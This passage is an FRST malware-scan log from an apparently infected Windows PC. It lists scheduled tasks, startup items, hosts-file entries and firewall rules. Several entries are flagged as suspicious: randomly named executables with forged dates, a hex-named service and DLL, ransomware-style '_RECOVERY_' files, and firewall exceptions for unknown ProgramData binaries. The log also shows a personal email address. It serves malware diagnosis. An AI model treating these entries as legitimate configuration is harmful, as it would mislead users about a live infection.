ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FrostWire 6\FrostWire 6.0.8-SafeMode.lnk -> C:\Program File (x86) Frostwire 6 - Torrent & Music Downloader\FrostWire 6\frostwire.bat ()

ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "

==================== Loaded Modules (Whitelisted) ==============

2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
